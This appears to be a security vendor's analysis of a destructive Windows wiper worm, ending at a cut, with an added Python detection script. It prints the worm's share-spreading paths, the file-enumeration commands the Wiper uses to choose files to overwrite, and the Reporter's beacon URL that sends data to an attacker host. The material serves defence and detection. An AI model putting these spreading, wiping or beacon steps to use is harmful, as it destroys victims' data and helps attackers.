When the worm is executed, it copies itself to the following network shares:
- \\[COMPUTER NAME]\ADMIN$
- \\[COMPUTER NAME]\C$\\WINDOWS
- \\[COMPUTER NAME]\D$\\WINDOWS
- \\[COMPUTER NAME]\E$\\WINDOWS
The worm creates the following files:
- %System%\trksrv.exe
- %System%\netinit.exe
- %System%\drivers\drdisk.sys
- %System%\[NAME SELECTED FROM LIST].exe
The worm deletes the following file:
%System%\drivers\drdisk.sys
The worm consists of several components:
- Dropper: main component that drops other modules and is the first to infect the system
- Wiper: module that contains destructive functionality
- Reporter: module that reports infection information back to the attacker
The Dropper component has the following functionality:
- Copies itself to %System%\trksrv.exe
- Drops the following files embedded in its resources:
  - 64-bit Dropper: %System%\trksrv.exe (contained in the "X509" resource)
  - Reporter module: %System%\netinit.exe (contained in the "PKCS7" resource)
  - Wiper module: %System%\[NAME SELECTED FROM LIST].exe (contained in the "PKCS12" resource)
  Note: [NAME SELECTED FROM LIST] may be one of the following:
  - caclsrv
  - certutl
  - clean
  - ctrl
  - dfrag
  - dnslookup
  - dvdquery
  - event
  - extract
  - findfile
  - fsutl
  - gpget
  - iissrv
  - ipsecure
  - msinit
  - ntx
  - ntdsutl
  - ntfrsutil
  - ntnw
  - power
  - rdsadmin
  - regsys
  - routeman
  - rrasrv
  - sacses
  - sfmsc
  - sigver
  - smbinit
  - wcscript
- Copies itself to the following network shares:
  - \\[COMPUTER NAME]\ADMIN$
  - \\[COMPUTER NAME]\C$\\WINDOWS
  - \\[COMPUTER NAME]\D$\\WINDOWS
  - \\[COMPUTER NAME]\E$\\WINDOWS
- Creates a job task to execute itself
- Creates the following service to start itself when Windows starts:
  - Service: TrkSvr
  - DisplayName: Distributed Link Tracking Server
  - ImagePath: %System%\trksvr.exe
The Wiper module has the following functionality:
- Deletes the existing driver at the following location and writes a legitimate driver embedded in its resources:
  %System%\drivers\drdisk.sys
  - The device driver is a clean disk driver that enables user-land applications to read and write disk sectors. The Wiper uses it to overwrite the computer's MBR, but the driver is not malicious by itself.
  - The file is digitally signed by "EldoS Corporation".
- Executes the following commands, which collect the names of the files to be overwritten and write them to f1.inf and f2.inf:
  - dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf
  - dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
  - dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf
  - dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
  - dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf
  - dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf
  - dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf
  - dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf
  - dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf
  - dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf
  - dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf
  Note: The files listed in f1.inf and f2.inf are overwritten with a JPEG image stored in the Wiper module. Overwritten files are rendered useless and cannot be repaired.
- Overwrites the MBR so that the compromised computer can no longer boot.
The Reporter module is responsible for sending information about the infection to the attacker. The information is sent as an HTTP GET request structured as follows:
http://[DOMAIN]/ajax_modal/modal/data.asp?mydata=[MYDATA]&uid=[UID]&state=[STATE]
The following data is sent to the attacker:
- [DOMAIN] = domain name
- [MYDATA] = number of files that were overwritten
- [UID] = IP address of the compromised computer
- [STATE] = random number
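The indicators above (dropped file names, the Wiper name list and the Reporter beacon format) can be turned into a small triage check. The following Python is an added example, not part of the Symantec writeup: it extracts Reporter beacons from proxy log lines and labels file names found in %System%. The log format and the domain `placeholder-c2.invalid` are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the writeup above; all sample data below is constructed.
DROPPED_FILES = {"trksrv.exe", "netinit.exe", "drdisk.sys"}  # drdisk.sys sits in %System%\drivers
WIPER_NAMES = {
    "caclsrv", "certutl", "clean", "ctrl", "dfrag", "dnslookup", "dvdquery", "event",
    "extract", "findfile", "fsutl", "gpget", "iissrv", "ipsecure", "msinit", "ntx",
    "ntdsutl", "ntfrsutil", "ntnw", "power", "rdsadmin", "regsys", "routeman",
    "rrasrv", "sacses", "sfmsc", "sigver", "smbinit", "wcscript",
}
BEACON_PATH = "/ajax_modal/modal/data.asp"
BEACON_PARAMS = {"mydata", "uid", "state"}

def parse_beacon(url):
    """Return the Reporter fields if url matches the beacon format, else None."""
    u = urlsplit(url)
    if u.path.lower() != BEACON_PATH:
        return None
    q = parse_qs(u.query)
    if not BEACON_PARAMS <= set(q):
        return None
    # mydata = files overwritten, uid = victim IP address, state = random number
    return {"domain": u.hostname, "mydata": q["mydata"][0],
            "uid": q["uid"][0], "state": q["state"][0]}

def scan_proxy_log(lines):
    """Pull every Reporter beacon out of free-form proxy log lines."""
    hits = []
    for line in lines:
        for url in re.findall(r"https?://\S+", line):
            beacon = parse_beacon(url)
            if beacon:
                hits.append(beacon)
    return hits

def classify_system_file(name):
    """Label a file name found in %System% against the indicators above.
    A Wiper name alone is weak evidence; correlate it with trksrv.exe or the TrkSvr service."""
    base = name.lower()
    if base in DROPPED_FILES:
        return "dropped component"
    stem, _, ext = base.rpartition(".")
    if ext == "exe" and stem in WIPER_NAMES:
        return "possible wiper name"
    return None

# Constructed sample proxy log; the domain is a placeholder, not a real indicator.
SAMPLE_PROXY_LOG = [
    "2012-08-15 10:21:03 10.1.2.3 GET http://placeholder-c2.invalid/ajax_modal/modal/data.asp?mydata=1523&uid=10.1.2.3&state=48213 200",
    "2012-08-15 10:21:04 10.1.2.9 GET http://intranet.invalid/index.html 200",
]
```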
Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":